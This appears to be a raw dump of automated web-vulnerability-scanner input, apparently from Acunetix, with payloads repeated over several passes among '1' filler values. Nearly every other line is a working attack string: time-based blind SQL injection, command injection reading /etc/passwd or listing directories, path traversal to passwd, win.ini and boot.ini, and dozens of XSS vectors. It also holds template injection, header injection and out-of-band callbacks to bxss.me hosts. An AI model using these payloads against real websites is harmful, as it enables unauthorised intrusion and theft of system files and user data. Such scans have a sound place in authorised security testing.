(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1

WEB-INF\web.xml

1

1<body onload=prompt(954515)>

1

1

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

-1)

1

1

1

1

-1))

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(932567)>

1

1

1

1

ME9WuO2B'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(907965)>

q9Z3ayz1')

)

1

1&n976258=v967712

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99214+99109}

'|'ld

1

1<img/src=">" onerror=alert(961766)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

zK3muxbW'))

!(()&&!|*|*|

1some_inexistent_file_with_long_name%00.jpg

1

1

1

"|"ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1

^(#$!@#$)(()))******

1<ScRiPt%20>prompt(930203)</sCripT>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

testasp.vulnweb.com

1

-1)

/etc/passwd

1&lt

'

'"()

1

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

\xf6<img acu onmouseover=prompt(900556) //\xf6>

1

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

9d3Kz4qY'

1

${@print(md5(acunetix_wvs_security_test))}

1

1<input autofocus onfocus=prompt(905528)>

1

C6PCjuaM')

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

||cat /etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitm30D4MYgSp.bxss.me/

gLdahoEJ'))

1

acunetix_wvs_invalid_filename

1

&dir

1

1

[url=http://www.acunetix.com]website security[/url]

1

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

file:///etc/passwd

1_If0uV <ScRiPt >prompt(925769)</ScRiPt>

http://www.acunetix.tst

1

"&dir&"

1

1

comments

1

1

/\../\../\../\../\../\../\../etc/passwd

'"

1

1

|dir

comments/.

1

1'"()&%<ScRiPt >prompt(985190)</ScRiPt>

1

1

<!--

WEB-INF/web.xml

1

'|dir

1

'"()&%<ScRiPt >prompt(900634)</ScRiPt>

1

1

1

1

"|dir

WEB-INF\web.xml

1

1

1_965897

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

1

acu7112\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7112

1

../../../../../../../../../../windows/win.ini.jpg

1

acux5574\xc0\xbez1\xc0\xbcz2a\x90bcxuca5574

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(915526)</ScRiPt>

................windowswin.ini

1<script>prompt(943654)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(952891)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?946138></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(998039)</ScRiPt>

1

1

response.write(9145569*9552706)

1

1

1<video><source onerror="javascript:prompt(934723)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'+response.write(9145569*9552706)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(988155)"></g></svg>

1

1

1

1

WEB-INF/web.xml

&cat /etc/passwd&

"+response.write(9145569*9552706)+"

1<div style=width:expression(prompt(997992))>

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1<iframe src='data:text/html

WEB-INF\web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(950383)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(975414)>

1

-1

1

`cat /etc/passwd`

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1)

1<img src=xyz OnErRor=prompt(997041)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

${99168+100345}

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<img/src=">" onerror=alert(902867)>

-1))

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n960212=v968625

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Qb2nVhsU'

1<ScRiPt%20>prompt(992753)</sCripT>

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1

"|"ld

NbhioiqA')

!(()&&!|*|*|

testasp.vulnweb.com

1&lt

/etc/passwd

dVhU7tMH'))

'"()

1

1

\xf6<img acu onmouseover=prompt(938342) //\xf6>

1

^(#$!@#$)(()))******

'

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<input autofocus onfocus=prompt(926866)>

1

1

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

"

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1)

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

[url=http://www.acunetix.com]website security[/url]

http://hitrTZGpXKzDf.bxss.me/

-1))

1

1

&dir

file:///etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

1_Zx8pj <ScRiPt >prompt(956893)</ScRiPt>

1

iQp2dDg4'

acunetix_wvs_invalid_filename

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

1

1

1

comments

http://www.acunetix.tst

ObRvqTql')

1

"&dir&"

WEB-INF/web.xml

1

'"

1

WG3FqqO6'))

comments

1

<!--

1'"()&%<ScRiPt >prompt(974003)</ScRiPt>

WEB-INF\web.xml

1

|dir

1

1

comments/.

1

'"()&%<ScRiPt >prompt(913005)</ScRiPt>

1

1

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

1_969760

1

1

../../../../../../../../../../boot.ini

"|dir

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acu9339\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9339

1

1

1

acux6120\xc0\xbez1\xc0\xbcz2a\x90bcxuca6120

1

................windowswin.ini

1

1

1<ScRiPt >prompt(936721)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(922114)</script>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(997833)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?903188></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(977385)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(905574)">

1

response.write(9764702*9279280)

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(919068)"></g></svg>

1

'+response.write(9764702*9279280)+'

1

WEB-INF/web.xml

1<div style=width:expression(prompt(916578))>

1

1

&cat /etc/passwd&

"+response.write(9764702*9279280)+"

1

WEB-INF\web.xml

1<iframe src='data:text/html

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<body onload=prompt(997104)>

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(947903)>

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(966815)>

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

`cat /etc/passwd`

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${100297+99949}

1<img/src=">" onerror=alert(957455)>

|cat /etc/passwd#

-1

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<ScRiPt%20>prompt(981599)</sCripT>

1

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1

1

1&n902553=v930478

-1)

)

"|"ld

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1))

1

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

\xf6<img acu onmouseover=prompt(992393) //\xf6>

tkfcb7t0'

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

1

/etc/passwd

1<input autofocus onfocus=prompt(963040)>

T27Vz57B')

'"()

1

1

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

AbKCboyR'))

1

'

||cat /etc/passwd

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

&dir

-1

1

[url=http://www.acunetix.com]website security[/url]

"

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://hitYJw8EUHxuV.bxss.me/

1

1

'&dir&'

1_GTftT <ScRiPt >prompt(980770)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}

comments

1

-1)

1

"&dir&"

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

${@print(md5(acunetix_wvs_security_test))}\

comments

-1))

http://www.acunetix.tst

file:///etc/passwd

1

1

|dir

1

1

comments/.

zJWW9PKs'

'"

/\../\../\../\../\../\../\../etc/passwd

1

'|dir

1

1

1

1

1

WEB-INF/web.xml

JKyHvzTn')

<!--

"|dir

1

1'"()&%<ScRiPt >prompt(985988)</ScRiPt>

1

1

1

1

WEB-INF\web.xml

FuJ51e8D'))

1

1

1

'"()&%<ScRiPt >prompt(954191)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini

1

1_908201

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

1

acu7664\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7664

1

1

..\..\..\..\..\..\..\..\windows\win.ini

acux4623\xc0\xbez1\xc0\xbcz2a\x90bcxuca4623

1

1

1

1<ScRiPt >prompt(908930)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<script>prompt(980890)</script>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(965769)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?943701></ScRiPt>

1

1

1

1<ScRiPt >prompt(929929)</ScRiPt>

response.write(9812229*9079232)

WEB-INF/web.xml

1

1

1

'+response.write(9812229*9079232)+'

1

1<video><source onerror="javascript:prompt(915823)">

WEB-INF\web.xml

1

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9812229*9079232)+"

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(945936)"></g></svg>

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<div style=width:expression(prompt(989577))>

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

${100149+99250}

1

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1

cat /etc/passwd

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<body onload=prompt(964107)>

1&n990536=v996668

`cat /etc/passwd`

1

-1)

)

1

1some_inexistent_file_with_long_name%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(945058)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

-1))

|cat /etc/passwd#

1

testasp.vulnweb.com

1

1<img src=xyz OnErRor=prompt(948932)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'|'ld

0hWFl6rV'

^(#$!@#$)(()))******

'"()

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1<img/src=">" onerror=alert(965715)>

1

Jl6YNsfY')

1

1

1

1

"|"ld

QGwod1I0'))

1

1<ScRiPt%20>prompt(990382)</sCripT>

"

/etc/passwd

-1

1

1

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1&lt

acunetix_wvs_invalid_filename

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

1

1

http://hitDZon5lxlqN.bxss.me/

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

\xf6<img acu onmouseover=prompt(974404) //\xf6>

${@print(md5(acunetix_wvs_security_test))}\

"

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

AW1KkLec'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments/.

1

1<input autofocus onfocus=prompt(968921)>

||cat /etc/passwd

1

1

f13eC7gq')

1

1

http://www.acunetix.tst

'"

&dir

<a href='http://www.acunetix.com'>website security</a>

file:///etc/passwd

1

1

1

1'"()&%<ScRiPt >prompt(902747)</ScRiPt>

cuG1oYno'))

<!--

1

1

/\../\../\../\../\../\../\../etc/passwd

[url=http://www.acunetix.com]website security[/url]

'&dir&'

1

1

1

1

'"()&%<ScRiPt >prompt(983830)</ScRiPt>

1

1_IknHh <ScRiPt >prompt(949656)</ScRiPt>

1

WEB-INF/web.xml

1

1

1

1_907574

"&dir&"

1

1

1

WEB-INF\web.xml

1

1

|dir

../../../../../../../../../../windows/win.ini

1

1

'|dir

../../../../../../../../../../boot.ini

1

"|dir

acu2632\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2632

1

1

../../../../../../../../../../windows/win.ini.jpg

acux7088\xc0\xbez1\xc0\xbcz2a\x90bcxuca7088

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(975777)</ScRiPt>

1

1

1

................windowswin.ini

1

1

1<script>prompt(908423)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(960883)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?999700></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(989123)</ScRiPt>

response.write(9113444*9808906)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9113444*9808906)+'

1<video><source onerror="javascript:prompt(915847)">

1

1

1

&cat /etc/passwd&

"+response.write(9113444*9808906)+"

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(978670)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

'&cat /etc/passwd&'

WEB-INF/web.xml

1<div style=width:expression(prompt(902941))>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

WEB-INF\web.xml

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

cat /etc/passwd

1

1

1<body onload=prompt(990797)>

../../../../../../../../../../etc/passwd.jpg

${99934+100463}

1

`cat /etc/passwd`

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(951118)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n966221=v923044

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

1

1

1<img src=xyz OnErRor=prompt(904732)>

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

'|'ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

-1))

1<img/src=">" onerror=alert(947902)>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

"|"ld

EiCBry4r'

^(#$!@#$)(()))******

'"()

1

1

1

1<ScRiPt%20>prompt(946080)</sCripT>

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Xkd0HjOU')

1

1

1

/etc/passwd

1&lt

"

1

1

5Al5RKAE'))

1

'

1

1

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

\xf6<img acu onmouseover=prompt(916658) //\xf6>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<input autofocus onfocus=prompt(976971)>

${@print(md5(acunetix_wvs_security_test))}\

1

||cat /etc/passwd

1

-1))

1

http://hite0JQoQ79o4.bxss.me/

1

1

acunetix_wvs_invalid_filename

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

eGiTxmeB'

<a href='http://www.acunetix.com'>website security</a>

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

'&dir&'

1

1wWIpPpD')

http://www.acunetix.tst

1

1

"&dir&"

1

comments

'"

[url=http://www.acunetix.com]website security[/url]

1

1

4ktVww4U'))

file:///etc/passwd

1

<!--

1_A8TOK <ScRiPt >prompt(937467)</ScRiPt>

1'"()&%<ScRiPt >prompt(918214)</ScRiPt>

comments/.

|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

'"()&%<ScRiPt >prompt(967967)</ScRiPt>

1

'|dir

1

WEB-INF/web.xml

1

1

1_991700

1

1

WEB-INF\web.xml

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu1340\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1340

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux9584\xc0\xbez1\xc0\xbcz2a\x90bcxuca9584

1

1

1<ScRiPt >prompt(962709)</ScRiPt>

................windowswin.ini

1

1

1

1<script>prompt(964480)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(993256)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?912621></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(955155)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(938338)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9230886*9410903)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(906146)"></g></svg>

1

1

'+response.write(9230886*9410903)+'

1

&cat /etc/passwd&

1

1<div style=width:expression(prompt(952523))>

"+response.write(9230886*9410903)+"

1

WEB-INF/web.xml

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<iframe src='data:text/html

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

WEB-INF\web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(942851)>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(964993)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

`cat /etc/passwd`

1

${100251+99130}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=xyz OnErRor=prompt(919149)>

-1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n951340=v968856

1

1

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1)

1<img/src=">" onerror=alert(912017)>

1

1

)

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

1

1<ScRiPt%20>prompt(937985)</sCripT>

1

/etc/passwd

'"()

AL7VCNse'

testasp.vulnweb.com

"|"ld

^(#$!@#$)(()))******

1

1&lt

1

'

1

vxZCG6XQ')

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

\xf6<img acu onmouseover=prompt(954941) //\xf6>

"

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

qV98pzm1'))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<input autofocus onfocus=prompt(936187)>

${@print(md5(acunetix_wvs_security_test))}

1

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1

1

http://hitlFAgxF5QkZ.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}\

<a href='http://www.acunetix.com'>website security</a>

1

||cat /etc/passwd

-1)

1

1

1

acunetix_wvs_invalid_filename

1

[url=http://www.acunetix.com]website security[/url]

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

file:///etc/passwd

-1))

1

1_Oc7he <ScRiPt >prompt(960441)</ScRiPt>

1

comments

http://www.acunetix.tst

1

1

cldHYszl'

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

1

1

1'"()&%<ScRiPt >prompt(980816)</ScRiPt>

comments

'"

WEB-INF/web.xml

1

NS05Rt04')

1

1

"&dir&"

<!--

comments/.

'"()&%<ScRiPt >prompt(937388)</ScRiPt>

1

RLFcllLU'))

1

WEB-INF\web.xml

|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

1_934543

1

1

'|dir

1

1

../../../../../../../../../../boot.ini

1

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu2699\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2699

1

1

................windowswin.ini

1

acux4750\xc0\xbez1\xc0\xbcz2a\x90bcxuca4750

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(935776)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(932373)</script>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(957409)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?944229></ScRiPt>

1

1

1

1

1

1<ScRiPt >prompt(924757)</ScRiPt>

1

WEB-INF/web.xml

1

1<video><source onerror="javascript:prompt(961322)">

1

1

WEB-INF\web.xml

response.write(9831785*9750691)

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(987334)"></g></svg>

&cat /etc/passwd&

1

'+response.write(9831785*9750691)+'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

